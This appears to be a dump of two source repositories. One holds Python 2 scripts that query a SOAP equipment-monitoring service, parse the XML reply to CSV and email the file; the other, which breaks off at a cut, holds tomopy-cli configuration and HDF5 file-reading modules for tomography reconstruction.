[ { "alpha_fraction": 0.6358225345611572, "alphanum_fraction": 0.6450216174125671, "avg_line_length": 34.693878173828125, "blob_id": "40fcdce98f8ff67653bed0836f9c35de4065f3fb", "content_id": "16001a8c053c6f5ea77cdb7e2c03e3141ca552a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1848, "license_type": "no_license", "max_line_length": 140, "num_lines": 49, "path": "/file_operation.py", "repo_name": "tanmayee30/XML_Prasing", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\r\nimport re\r\nimport time\r\ninfile = open(\"parse.xml\",\"r\")\r\ncontents = infile.read()\r\nsoup = BeautifulSoup(contents,'xml')\r\nprint soup.prettify()\r\ntitles = soup.find_all('EquipmentParameterDetailsModel')\r\ndata = soup.find_all('ParamID')\r\n\r\n#print titles\r\nfor EquipmentParameterDetailsModel in titles:\r\n x = soup.contents[0].EquipmentParameterDetailsModel\r\n # print x #this gives me data for only ParamID=670 I want to capture the same for ParamID=671\r\n # print \"\\n\"\r\n #for ParamID in data: \r\n y = soup.contents[0].EquipmentParameterDetailsModel.ParamID\r\n # print y\r\n '''\r\n name_3 = EquipmentParameterDetailsModel.contents[3]\r\n print name_3\r\n print \"\\n\"\r\n time.sleep(1)'''\r\n #print(EquipmentParameterDetailsModel.get_text())\r\n #print (soup.find_all(ParamID='671'))\r\n #print soup.EquipmentParameterDetailsModel.ParamID\r\n #print soup.EquipmentParameterDetailsModel.ParamName\r\n #print soup.EquipmentParameterDetailsModel.ParamValue\r\n #time.sleep(1)\r\n #print soup.EquipmentParameterDetailsModel.ParamID\r\n #print soup.EquipmentParameterDetailsModel.ParamName\r\n #print soup.EquipmentParameterDetailsModel.ParamValue\r\n\r\n #for EquipmentParameterDetailsModel in titles:\r\n# print(sou.equipmentparameterdetailsmodel.find)\r\n \r\n\r\n#print(sou.paramlist.findAll(name=\"paramid\"))\r\n#print (sou.equipmentparameterdetailsmodel.find(name=\"paramvalue\"))\r\n '''ID = soup.find_all('ParamID') \r\n value = soup.find_all('ParamValue')\r\n #print ID\r\n for ParamID in ID:\r\n \r\n for ParamValue in value:\r\n print (ParamID.get_text())\r\n print \"\\t\\t\"\r\n print(ParamValue.get_text())\r\n print \"\\n\\n\" '''\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n" }, { "alpha_fraction": 0.5820689797401428, "alphanum_fraction": 0.6151723861694336, "avg_line_length": 36.157894134521484, "blob_id": "09d88e783df434d3f6bfb9ddf41b9afe951eb2ab", "content_id": "d837e60a2926f7f3c7c0bea975f46d43cc5bc650", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 725, "license_type": "no_license", "max_line_length": 146, "num_lines": 19, "path": "/Calender.py", "repo_name": "tanmayee30/XML_Prasing", "src_encoding": "UTF-8", "text": "from datetime import *\r\nimport datetime\r\nimport time\r\n\r\nmonths = [\"Unknown\",\"January\",\"Febuary\",\"Marchh\",\"April\",\"May\",\"June\",\"July\",\"August\",\"September\",\"October\",\"November\",\"December\"]\r\ndatetimeWrite = (time.strftime(\"%d-%m-%Y \"))\r\ndate = time.strftime(\"%d\")\r\nmonth= time.strftime(\"%m\")\r\nchoices = {'01': 'Jan', '02':'Feb','03':'Mar','04':'Apr','05':'May','06': 'Jun','07':'Jul','08':'Aug','09':'Sep','10':'Oct','11':'Nov','12':'Dec'}\r\nresult = choices.get(month, 'default')\r\nyear = time.strftime(\"%Y\")\r\nDate = date+\"-\"+result+\"-\"+year\r\nprint Date\r\n\r\nyear=datetime.date.today().strftime(\"%Y\")\r\nmonth=datetime.date.today().strftime(\"%b\")\r\nday=datetime.date.today().strftime(\"%d\")\r\nDate = 
day+\"-\"+month+\"-\"+year\r\nprint Date\r\n" }, { "alpha_fraction": 0.6778181791305542, "alphanum_fraction": 0.7039999961853027, "avg_line_length": 53, "blob_id": "95f44209ae2d21c90c5111b59bc5a4ea248c7253", "content_id": "b57a682a3a2b186587e40e757c85aa38eebeff8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1375, "license_type": "no_license", "max_line_length": 576, "num_lines": 25, "path": "/Sudos.py", "repo_name": "tanmayee30/XML_Prasing", "src_encoding": "UTF-8", "text": "from suds.client import Client\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nurl=\"http://maven.geohems.com/mvts/AssetTrackingObjWebService.asmx?WSDL\"\r\nclient = Client(url)\r\n#print client ## shows the details of this service\r\npayload = \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?>\\n<soap:Envelope xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:xsd=\\\"http://www.w3.org/2001/XMLSchema\\\" xmlns:soap=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\">\\n <soap:Body>\\n <GetEquipmentEngineMonitoringReport xmlns=\\\"http://tempuri.org/\\\">\\n <APIKey>J12CM751YTU</APIKey>\\n <EquipmentId>Govind-Paritwadi-CP2</EquipmentId>\\n <StartDate>21-Jun-2017 05:34</StartDate>\\n <EndDate>21-Jun-2017 05:35</EndDate>\\n </GetEquipmentEngineMonitoringReport>\\n </soap:Body>\\n</soap:Envelope>\\n\\n\"\r\nheaders = {\r\n 'content-type': \"text/xml; charset=utf-8\",\r\n 'soapaction': \"http://tempuri.org/GetEquipmentEngineMonitoringReport\",\r\n } \r\nresponse = requests.post(url,data=payload,headers=headers)\r\nprint response.content\r\ndata = response.content\r\n#required_dict = Client.dict(suds_object)\r\n#print required_dict\r\nfp = open(\"parse.xml\",\"w\")\r\nfp.write(data)\r\nfp.close()\r\n\r\n'''soup = BeautifulSoup(data, 'html.parser')\r\nsearchTerms= ['Time','ParamID','ParamName','Paramvalue']\r\nfor st in searchTerms:\r\n print st+'\\t'\r\n print soup.find(st.lower()).contents'''\r\n" }, { "alpha_fraction": 0.7981651425361633, "alphanum_fraction": 0.7981651425361633, "avg_line_length": 53.5, "blob_id": "96807cf3febd640119773ff213a7ecb93c22daed", "content_id": "5d65d6652e011e8e4a432ffd3d3c06e49cff908f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 109, "license_type": "no_license", "max_line_length": 87, "num_lines": 2, "path": "/README.md", "repo_name": "tanmayee30/XML_Prasing", "src_encoding": "UTF-8", "text": "# Nested_XML_Parsing\nParse soap XML envelop and extract that nested XML to get the particular field of data.\n" }, { "alpha_fraction": 0.5598695278167725, "alphanum_fraction": 0.5753999352455139, "avg_line_length": 37.02424240112305, "blob_id": "92952bb7177ad3a8250ea8dbbf559ebaa668557a", "content_id": "fff61201a17c0b156e91b36283dfa9169e2ec92b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6439, "license_type": "no_license", "max_line_length": 575, "num_lines": 165, "path": "/Final_parse.py", "repo_name": "tanmayee30/XML_Prasing", "src_encoding": "UTF-8", "text": "from suds.client import Client #Soap client for webservices\r\nimport requests\r\nfrom lxml import etree\r\nimport datetime\r\nimport time\r\nimport csv\r\nimport os.path\r\nfrom time import strftime, gmtime, localtime\r\n\r\n############################ Liberaries for Email ################################\r\n\r\nimport smtplib\r\nimport mimetypes\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email import encoders\r\nfrom 
email.message import Message\r\nfrom email.mime.audio import MIMEAudio\r\nfrom email.mime.base import MIMEBase\r\nfrom email.mime.image import MIMEImage\r\nfrom email.mime.text import MIMEText\r\n\r\n############################ Date and Time #######################################\r\n\r\nyear = datetime.date.today().strftime(\"%Y\")\r\nmonth = datetime.date.today().strftime(\"%b\")\r\nday = datetime.date.today().strftime(\"%d\") \r\nDate = day+\"-\"+month+\"-\"+year\r\nTime = \"10:20\"#(time.strftime(\"%H:%M\"))#\"09:30\"\r\n#print Time\r\n\r\n#time_hour = time.strftime(\"%H\")\r\n#time_min = time.strftime(\"%M\") \r\n#time_one = int(time_min)-2\r\n#STime = \"10.15\"#time_hour+\":\"+ str(time_one)\r\n#print STime\r\n#start_time = datetime.datetime.now()-datetime.timedelta(minutes=1)\r\n#print start_time\r\n\r\n############################# IST to GMT conversion ##############################\r\n\r\nutc_Time = strftime('%H:%M', gmtime()) #UTC time\r\nprint utc_Time\r\nutc_hr = strftime('%H',gmtime())\r\nutc_min = strftime('%M',gmtime())\r\n#print utc_min\r\nlag_time = int(utc_min)-02\r\nlag_one = str(lag_time)\r\nlength = len(lag_one)\r\nif length < 2:\r\n le = '0'+lag_one\r\n var1 = utc_hr+\":\"+str(le)\r\n print var1\r\nelse:\r\n print lag_time\r\n var1 = utc_hr+\":\"+str(lag_time)\r\n print var1\r\n\r\n\r\n############################ Email variables ######################################\r\n\r\nemailfrom = \"[email protected]\" #Senders email addr\r\nemailto = \"[email protected]\" #Receivers email addr\r\nfileToSend = Date+\".csv\" #26-Jun-2017.csv\"\r\nusername = \"**********************\"\r\npassword = \"*******************\"\r\n\r\n############################ Calling URL for getting soap response ################\r\n\r\ncentre_name = ['Amul-Khadawali','Amul -Talvali','Amul-Kude','Amul-Lalthane','Amul-Musarne','Amul-Malwada','Amul Pedpargaon']\r\n #'Cavinkare',\r\n #'Device--0019',\r\n #'Govind-Paritwadi-CP1','Govind- Paritwadi-CP2',\r\n #'Mobile chiller','Mother Dairy Test',\r\n #'Nestle-Punjab',\r\n #'Promethean Lab']\r\nurl = \"http://rms.geohems.com/AssetTrackingObjWebService.asmx?WSDL\"\r\nclient = Client(url)\r\n\r\nfor i in centre_name:\r\n payload = \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?>\\n<soap:Envelope xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:xsd=\\\"http://www.w3.org/2001/XMLSchema\\\" xmlns:soap=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\">\\n <soap:Body>\\n <GetEquipmentEngineMonitoringReport xmlns=\\\"http://tempuri.org/\\\">\\n <APIKey>J12CM751YTU</APIKey>\\n <EquipmentId>\"+i+\"</EquipmentId>\\n <StartDate>\"+Date+\" \"+var1+\"</StartDate>\\n <EndDate>\"+Date+\" \"+utc_Time+\"</EndDate>\\n </GetEquipmentEngineMonitoringReport>\\n </soap:Body>\\n</soap:Envelope>\\n\\n\"\r\n print payload\r\n headers = {\r\n 'content-type': \"text/xml; charset=utf-8\",\r\n 'soapaction': \"http://tempuri.org/GetEquipmentEngineMonitoringReport\",\r\n } \r\n response = requests.post(url,data=payload,headers=headers)\r\n\r\n data = response.content\r\n #print data\r\n fp = open(\"parse.xml\",\"w\")\r\n fp.write(data)\r\n fp.close()\r\n\r\n tree = etree.XML(data)\r\n #print len(data)\r\n ns = {'default': 'http://tempuri.org/'}\r\n\r\n centers = tree.xpath('//default:EquipmentId/text()', namespaces=ns)\r\n times = tree.xpath('//default:Time/text()', namespaces=ns)\r\n #ids = tree.xpath('//default:ParamID/text()', namespaces=ns)\r\n names = tree.xpath('//default:ParamName/text()', namespaces=ns)\r\n values = 
tree.xpath('//default:ParamValue/text()', namespaces=ns)\r\n\r\n print(centers)\r\n print(times[0]) +\"\\t\"+(names[0])+\"\\t\"+(values[0])\r\n print(times[54]) +\"\\t\"+(names[0])+\"\\t\"+(values[54])\r\n #print(times[108])+\"\\t\"+(names[0])+\"\\t\"+(values[108])\r\n print(times[0]) +\"\\t\"+(names[1])+\"\\t\"+(values[1])\r\n print(times[54]) +\"\\t\"+(names[1])+\"\\t\"+(values[54])\r\n #print(times[108])+\"\\t\"+(names[1])+\"\\t\"+(values[108])\r\n\r\n#################################### Writing in .csv file ######################################### \r\n\r\n file_exists = os.path.isfile(\"C:/Python27/\"+Date+\".csv\")\r\n with open(Date+'.csv','a')as csvfile:\r\n headers = ['center','Time','Name','Value']\r\n writer = csv.DictWriter(csvfile, delimiter=',', lineterminator='\\n',fieldnames=headers)\r\n #writer = csv.DictWriter(csvfile,fieldnames=fieldnames)\r\n if not file_exists:\r\n writer.writeheader()\r\n \r\n writer.writerow({'center':centers[0],'Time':times[0],'Name':names[0],'Value':values[0]})\r\n writer.writerow({'center':centers[0],'Time':times[0],'Name':names[1],'Value':values[1]})\r\n\r\n#################################### code for sending Email #######################################\r\n \r\nmsg = MIMEMultipart()\r\nmsg[\"From\"] = emailfrom\r\nmsg[\"To\"] = emailto\r\nmsg[\"Subject\"] = \"Promethean logger info\"\r\nmsg.preamble = \"Promethean logger info\"\r\n\r\nctype, encoding = mimetypes.guess_type(fileToSend)\r\nif ctype is None or encoding is not None:\r\n ctype = \"application/octet-stream\"\r\n\r\nmaintype, subtype = ctype.split(\"/\", 1)\r\n\r\nif maintype == \"text\":\r\n fp = open(fileToSend)\r\n # Note: we should handle calculating the charset\r\n attachment = MIMEText(fp.read(), _subtype=subtype)\r\n fp.close()\r\nelif maintype == \"image\":\r\n fp = open(fileToSend, \"rb\")\r\n attachment = MIMEImage(fp.read(), _subtype=subtype)\r\n fp.close()\r\nelif maintype == \"audio\":\r\n fp = open(fileToSend, \"rb\")\r\n attachment = MIMEAudio(fp.read(), _subtype=subtype)\r\n fp.close()\r\nelse:\r\n fp = open(fileToSend, \"rb\")\r\n attachment = MIMEBase(maintype, subtype)\r\n attachment.set_payload(fp.read())\r\n fp.close()\r\n encoders.encode_base64(attachment)\r\nattachment.add_header(\"Content-Disposition\", \"attachment\", filename=fileToSend)\r\nmsg.attach(attachment)\r\n\r\nserver = smtplib.SMTP(\"smtp.gmail.com:587\")\r\nserver.starttls()\r\nserver.login(username,password)\r\nserver.sendmail(emailfrom, emailto, msg.as_string())\r\nserver.quit()\r\n" }, { "alpha_fraction": 0.5580110549926758, "alphanum_fraction": 0.6174033284187317, "avg_line_length": 26.959999084472656, "blob_id": "1bac673fe90f23329fdc7267dc0605f1fb39388e", "content_id": "b16c3bc76cbc276a8fffc2d8f60883da9ff93116", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 724, "license_type": "no_license", "max_line_length": 70, "num_lines": 25, "path": "/TimeZone.py", "repo_name": "tanmayee30/XML_Prasing", "src_encoding": "UTF-8", "text": "from time import strftime, gmtime, localtime\r\n\r\n#def aslocaltimestr(utc_dt):\r\n# return utc_to_local(utc_dt).strftime('%Y-%m-%d %H:%M:%S.%f %Z%z')\r\n\r\n#print(aslocaltimestr(datetime(2010, 6, 6, 17, 29, 7, 730000)))\r\n#print(aslocaltimestr(datetime(2010, 12, 6, 17, 29, 7, 730000)))\r\n#print(aslocaltimestr(datetime.utcnow()))\r\n\r\nutc_Time = strftime('%H:%M', gmtime()) #UTC time\r\nprint utc_Time\r\nutc_hr = strftime('%H',gmtime())\r\nutc_min = strftime('%M',gmtime())\r\n#print utc_min\r\nlag_time = 
int(utc_min) - 1 # note: goes negative when the UTC minute is 00; see the timedelta sketch after this record for a safer version\r\nlag_one = str(lag_time)\r\nlength = len(lag_one)\r\nif length < 2:\r\n le = '0' + lag_one\r\n var1 = utc_hr + \":\" + le\r\n print var1\r\nelse:\r\n print lag_time\r\n var1 = utc_hr + \":\" + str(lag_time)\r\n print var1\r\n" } ]
6
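A minimal sketch (not part of the repository above): both scripts in this record build their SOAP query window by slicing the UTC minute string and subtracting a small literal, which yields a negative minute whenever the clock reads :00 or :01, and relies on a Python 2 octal literal. Computing the window with datetime arithmetic handles the rollover for free. The two-minute lag is copied from the original script; the function and variable names here are illustrative assumptions.

```python
from datetime import datetime, timedelta

def utc_window(lag_minutes=2):
    """Return (start, end) as HH:MM strings for a UTC window ending now."""
    end = datetime.utcnow()
    start = end - timedelta(minutes=lag_minutes)  # hour/day rollover handled
    return start.strftime('%H:%M'), end.strftime('%H:%M')

var1, utc_Time = utc_window()  # the two values interpolated into the payload
```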
data-exchange/tomopy-cli-last-before-tomography
https://github.com/data-exchange/tomopy-cli-last-before-tomography
a9f6fe354a17d183a98d9c3b731e956d40e0cac2
6fd87b4c3023364bfe506446eac0d5c540cc5c53
c0a4485f1c6edf46b4f42b1e3c3bd1c2d0b66098
refs/heads/master
2020-12-10T04:13:10.596848
2020-01-12T20:58:42
2020-01-12T20:58:42
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5493765473365784, "alphanum_fraction": 0.5572595596313477, "avg_line_length": 33.27027130126953, "blob_id": "c1d16902fc591582253dbfd8c01b29752f5105cf", "content_id": "669a13c196ecbe1994cf1d5046b9030bffd3a6d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13956, "license_type": "no_license", "max_line_length": 182, "num_lines": 407, "path": "/tomopy_cli/config.py", "repo_name": "data-exchange/tomopy-cli-last-before-tomography", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport pathlib\nimport argparse\nimport configparser\n\nfrom collections import OrderedDict\n\nfrom tomopy_cli import log\nfrom tomopy_cli import util\n\nLOGS_HOME = os.path.join(str(pathlib.Path.home()), 'logs')\nCONFIG_FILE_NAME = os.path.join(str(pathlib.Path.home()), 'tomopy.conf')\nROTATION_AXIS_FILE_NAME = \"rotation_axis.json\"\n\nSECTIONS = OrderedDict()\n\n\nSECTIONS['general'] = {\n 'config': {\n 'default': CONFIG_FILE_NAME,\n 'type': str,\n 'help': \"File name of configuration file\",\n 'metavar': 'FILE'},\n 'logs-home': {\n 'default': LOGS_HOME,\n 'type': str,\n 'help': \"Log file directory\",\n 'metavar': 'FILE'},\n 'rotation-axis-file': {\n 'default': ROTATION_AXIS_FILE_NAME,\n 'type': str,\n 'help': \"File name of rataion axis locations\",\n 'metavar': 'FILE'},\n 'verbose': {\n 'default': False,\n 'help': 'Verbose output',\n 'action': 'store_true'}\n }\n\nSECTIONS['find-rotation-axis'] = {\n 'center-search-width': {\n 'type': float,\n 'default': 10.0,\n 'help': \"+/- center search width (pixel). Search is in 0.5 pixel increments\"},\n }\n\nSECTIONS['file-reading'] = {\n 'hdf-file': {\n 'default': '.',\n 'type': str,\n 'help': \"Name of the last used hdf file or directory containing multiple hdf files\",\n 'metavar': 'PATH'},\n 'hdf-file-type': {\n 'default': 'standard',\n 'type': str,\n 'help': \"Input file type\",\n 'choices': ['standard', 'flip_and_stich', 'mosaic']},\n 'nsino': {\n 'default': 0.5,\n 'type': float,\n 'help': 'Location of the sinogram used for slice reconstruction and find axis (0 top, 1 bottom)'},\n 'nsino-per-chunk': { \n 'type': util.positive_int,\n 'default': 32,\n 'help': \"Number of sinagram per chunk. 
Use larger numbers with computers with larger memory\",\n 'choices': [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048]},\n 'binning': {\n 'type': util.positive_int,\n 'default': 0,\n 'help': \"Reconstruction binning factor as power(2, choice)\",\n 'choices': [0, 1, 2, 3]},\n 'rotation-axis': {\n 'default': -1.0,\n 'type': float,\n 'help': \"Location of rotation axis\"},\n 'rotation-axis-flip': {\n 'default': -1.0,\n 'type': float,\n 'help': \"Location of rotation axis in a 0-360 flip and stich data collection\"},\n 'reverse': {\n 'default': False,\n 'help': 'When set, the data set was collected in reverse (180-0)',\n 'action': 'store_true'},\n 'blocked-views': {\n 'default': False,\n 'help': 'When set, the missing-angles options are used',\n 'action': 'store_true'},\n 'dark-zero': {\n 'default': False,\n 'help': 'When set, the the dark field is set to zero',\n 'action': 'store_true'} \n }\n\nSECTIONS['missing-angles'] = {\n 'missing-angles-start': {\n 'type': util.positive_int,\n 'default': 0,\n 'help': \"Projection number of the first blocked view\"},\n 'missing-angles-end': {\n 'type': util.positive_int,\n 'default': 1,\n 'help': \"Projection number of the first blocked view\"},\n }\n\nSECTIONS['zinger-removal'] = {\n 'zinger-removal-method': {\n 'default': 'none',\n 'type': str,\n 'help': \"Zinger removal correction method\",\n 'choices': ['none', 'standard']},\n 'zinger-level-projections': {\n 'default': 800.0,\n 'type': float,\n 'help': 'Expected difference value between outlier value and the median value of the array'},\n 'zinger-level-white': {\n 'default': 1000.0,\n 'type': float,\n 'help': 'Expected difference value between outlier value and the median value of the array'},\n 'zinger-size': {\n 'type': util.positive_int,\n 'default': 3,\n 'help': \"Size of the median filter\"},\n }\n\nSECTIONS['flat-correction'] = {\n 'flat-correction-method': {\n 'default': 'standard',\n 'type': str,\n 'help': \"Flat correction method\",\n 'choices': ['standard', 'air', 'none']},\n 'normalization-cutoff': {\n 'default': 1.0,\n 'type': float,\n 'help': 'Permitted maximum vaue for the normalized data'},\n 'air': {\n 'type': util.positive_int,\n 'default': 10,\n 'help': \"Number of pixels at each boundary to calculate the scaling factor\"},\n 'fix-nan-and-inf': {\n 'default': False,\n 'help': \"Fix nan and inf\",\n 'action': 'store_true'},\n 'fix-nan-and-inf-value': {\n 'default': 0.0,\n 'type': float,\n 'help': \"Values to be replaced with negative values in array\"},\n 'minus-log': {\n 'default': False,\n 'help': \"Minus log\",\n 'action': 'store_true'},\n }\n\nSECTIONS['retrieve-phase'] = {\n 'retrieve-phase-method': {\n 'default': 'none',\n 'type': str,\n 'help': \"Phase retrieval correction method\",\n 'choices': ['none', 'paganin']},\n 'energy': {\n 'default': 20,\n 'type': float,\n 'help': \"X-ray energy [keV]\"},\n 'propagation-distance': {\n 'default': 60,\n 'type': float,\n 'help': \"Sample detector distance [mm]\"},\n 'pixel-size': {\n 'default': 1.17,\n 'type': float,\n 'help': \"Pixel size [microns]\"},\n 'retrieve-phase-alpha': {\n 'default': 0.001,\n 'type': float,\n 'help': \"Regularization parameter\"},\n 'retrieve-phase-alpha-try': {\n 'default': False,\n 'help': \"When set, multiple reconstruction of the same slice with different alpha coefficient are generated\",\n 'action': 'store_true'},\n }\n\nSECTIONS['remove-stripe'] = {\n 'remove-stripe-method': {\n 'default': 'none',\n 'type': str,\n 'help': \"Remove stripe method: none, fourier-wavelet, titarenko, smoothing filter\",\n 
'choices': ['none', 'fw', 'ti', 'sf']},\n }\n\nSECTIONS['fw'] = {\n 'fw-sigma': {\n 'default': 1,\n 'type': float,\n 'help': \"Fourier-Wavelet remove stripe damping parameter\"},\n 'fw-filter': {\n 'default': 'sym16',\n 'type': str,\n 'help': \"Fourier-Wavelet remove stripe filter\",\n 'choices': ['haar', 'db5', 'sym5', 'sym16']},\n 'fw-level': {\n 'type': util.positive_int,\n 'default': 7,\n 'help': \"Fourier-Wavelet remove stripe level parameter\"},\n 'fw-pad': {\n 'default': False,\n 'help': \"When set, Fourier-Wavelet remove stripe extend the size of the sinogram by padding with zeros\",\n 'action': 'store_true'},\n }\n\nSECTIONS['ti'] = {\n 'ti-alpha': {\n 'default': 1.5,\n 'type': float,\n 'help': \"Titarenko remove stripe damping factor\"},\n 'ti-nblock': {\n 'default': 0,\n 'type': util.positive_int,\n 'help': \"Titarenko remove stripe number of blocks\"},\n }\n\nSECTIONS['sf'] = {\n 'sf-size': {\n 'default': 5,\n 'type': util.positive_int,\n 'help': \"Smoothing filter remove stripe size\"}\n }\n\nSECTIONS['reconstruction'] = {\n 'filter': {\n 'default': 'parzen',\n 'type': str,\n 'help': \"Reconstruction filter\",\n 'choices': ['none', 'shepp', 'cosine', 'hann', 'hamming', 'ramlak', 'parzen', 'butterworth']},\n 'reconstruction-type': {\n 'default': 'try',\n 'type': str,\n 'help': \"Reconstruct slice or full data set. For option (try): multiple reconstruction of the same slice with different (rotation axis) are generated\",\n 'choices': ['try', 'slice', 'full']},\n 'reconstruction-algorithm': {\n 'default': 'gridrec',\n 'type': str,\n 'help': \"Reconstruction algorithm\",\n 'choices': ['art', 'astrasirt', 'astracgls', 'bart', 'fpb', 'gridrec', 'mlem', 'osem', 'ospml_hybrid', 'ospml_quad', 'pml_hybrid', 'pml_quad', 'sirt', 'tv', 'grad', 'tikh']},\n 'reconstruction-mask': {\n 'default': False,\n 'help': \"When set, applies circular mask to the reconstructed slices\",\n 'action': 'store_true'},\n 'reconstruction-mask-ratio': {\n 'default': 1.0,\n 'type': float,\n 'help': \"Ratio of the mask’s diameter in pixels to the smallest edge size along given axis\"},\n 'padding': {\n 'default': False,\n 'help': \"When set, raw data are padded/unpadded before/after reconstruction\",\n 'action': 'store_true'},\n }\n\nSECTIONS['iterative'] = {\n 'iteration-count': {\n 'default': 10,\n 'type': util.positive_int,\n 'help': \"Maximum number of iterations\"},\n }\n\nRECON_PARAMS = ('find-rotation-axis', 'file-reading', 'missing-angles', 'zinger-removal', 'flat-correction', 'remove-stripe', 'fw', \n 'ti', 'sf', 'retrieve-phase', 'reconstruction', 'iterative')\nFIND_CENTER_PARAMS = ('file-reading', 'find-rotation-axis')\n\n# PREPROC_PARAMS = ('flat-correction', 'remove-stripe', 'retrieve-phase')\n\nNICE_NAMES = ('General', 'Find rotation axis', 'File reading', 'Missing angles', 'Zinger removal', 'Flat correction', 'Retrieve phase', \n 'Remove stripe','Fourier wavelet', 'Titarenko', 'Smoothing filter', 'Reconstruction', 'Iterative')\n\ndef get_config_name():\n \"\"\"Get the command line --config option.\"\"\"\n name = CONFIG_FILE_NAME\n for i, arg in enumerate(sys.argv):\n if arg.startswith('--config'):\n if arg == '--config':\n return sys.argv[i + 1]\n else:\n name = sys.argv[i].split('--config')[1]\n if name[0] == '=':\n name = name[1:]\n return name\n\n return name\n\n\ndef parse_known_args(parser, subparser=False):\n \"\"\"\n Parse arguments from file and then override by the ones specified on the\n command line. 
Use *parser* for parsing and is *subparser* is True take into\n account that there is a value on the command line specifying the subparser.\n \"\"\"\n if len(sys.argv) > 1:\n subparser_value = [sys.argv[1]] if subparser else []\n config_values = config_to_list(config_name=get_config_name())\n values = subparser_value + config_values + sys.argv[1:]\n #print(subparser_value, config_values, values)\n else:\n values = \"\"\n\n return parser.parse_known_args(values)[0]\n\n\ndef config_to_list(config_name=CONFIG_FILE_NAME):\n \"\"\"\n Read arguments from config file and convert them to a list of keys and\n values as sys.argv does when they are specified on the command line.\n *config_name* is the file name of the config file.\n \"\"\"\n result = []\n config = configparser.ConfigParser()\n\n if not config.read([config_name]):\n return []\n\n for section in SECTIONS:\n for name, opts in ((n, o) for n, o in SECTIONS[section].items() if config.has_option(section, n)):\n value = config.get(section, name)\n\n if value is not '' and value != 'None':\n action = opts.get('action', None)\n\n if action == 'store_true' and value == 'True':\n # Only the key is on the command line for this action\n result.append('--{}'.format(name))\n\n if not action == 'store_true':\n if opts.get('nargs', None) == '+':\n result.append('--{}'.format(name))\n result.extend((v.strip() for v in value.split(',')))\n else:\n result.append('--{}={}'.format(name, value))\n\n return result\n\n\nclass Params(object):\n def __init__(self, sections=()):\n self.sections = sections + ('general', )\n\n def add_parser_args(self, parser):\n for section in self.sections:\n for name in sorted(SECTIONS[section]):\n opts = SECTIONS[section][name]\n parser.add_argument('--{}'.format(name), **opts)\n\n def add_arguments(self, parser):\n self.add_parser_args(parser)\n return parser\n\n def get_defaults(self):\n parser = argparse.ArgumentParser()\n self.add_arguments(parser)\n\n return parser.parse_args('')\n\n\ndef write(config_file, args=None, sections=None):\n \"\"\"\n Write *config_file* with values from *args* if they are specified,\n otherwise use the defaults. 
If *sections* are specified, write values from\n *args* only to those sections, use the defaults on the remaining ones.\n \"\"\"\n config = configparser.ConfigParser()\n for section in SECTIONS:\n config.add_section(section)\n for name, opts in SECTIONS[section].items():\n if args and sections and section in sections and hasattr(args, name.replace('-', '_')):\n value = getattr(args, name.replace('-', '_'))\n if isinstance(value, list):\n # print(type(value), value)\n value = ', '.join(value)\n else:\n value = opts['default'] if opts['default'] is not None else ''\n\n prefix = '# ' if value == '' else ''\n\n if name != 'config':\n config.set(section, prefix + name, str(value))\n with open(config_file, 'w') as f:\n config.write(f)\n\n\ndef log_values(args):\n \"\"\"Log all values set in the args namespace.\n\n Arguments are grouped according to their section and logged alphabetically\n using the DEBUG log level thus --verbose is required.\n \"\"\"\n args = args.__dict__\n\n log.warning('tomopy-cli status start')\n for section, name in zip(SECTIONS, NICE_NAMES):\n entries = sorted((k for k in args.keys() if k.replace('_', '-') in SECTIONS[section]))\n\n # print('log_values', section, name, entries)\n if entries:\n log.info(name)\n\n for entry in entries:\n value = args[entry] if args[entry] is not None else \"-\"\n log.info(\" {:<16} {}\".format(entry, value))\n\n log.warning('tomopy-cli status end')\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5776085257530212, "alphanum_fraction": 0.6150356531143188, "avg_line_length": 32.726776123046875, "blob_id": "96b1bafe7d375572b00e833d041a59797a935f03", "content_id": "cf2fe0ab7e6e727b0b42797c57ef5a66c82890ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6172, "license_type": "no_license", "max_line_length": 107, "num_lines": 183, "path": "/tomopy_cli/file_io.py", "repo_name": "data-exchange/tomopy-cli-last-before-tomography", "src_encoding": "UTF-8", "text": "import os\nimport h5py\nimport json\nimport collections\nimport tomopy\nimport dxchange\nimport dxchange.reader as dxreader\nimport numpy as np\n\nfrom tomopy_cli import log\nfrom tomopy_cli import proc\n\n \ndef read_tomo(sino, params):\n\n if params.hdf_file_type == 'standard':\n # Read APS 32-BM raw data.\n log.info(\" *** loading a standard data set: %s\" % params.hdf_file)\n proj, flat, dark, theta = dxchange.read_aps_32id(params.hdf_file, sino=sino)\n elif params.hdf_file_type == 'flip_and_stich':\n log.info(\" *** loading a 360 deg flipped data set: %s\" % params.hdf_file)\n proj360, flat360, dark360, theta360 = dxchange.read_aps_32id(params.hdf_file, sino=sino)\n proj, flat, dark = flip_and_stitch(params, proj360, flat360, dark360)\n theta = theta360[:len(theta360)//2] # take first half\n else: # params.hdf_file_type == 'mosaic':\n log.error(\" *** loading a mosaic data set is not supported yet\")\n exit()\n\n if params.reverse:\n log.info(\" *** correcting for 180-0 data collection\")\n step_size = (theta[1] - theta[0]) \n theta_size = dxreader.read_dx_dims(params.hdf_file, 'data')[0]\n theta = np.linspace(np.pi , (0+step_size), theta_size) \n\n if params.blocked_views:\n log.info(\" *** correcting for blocked 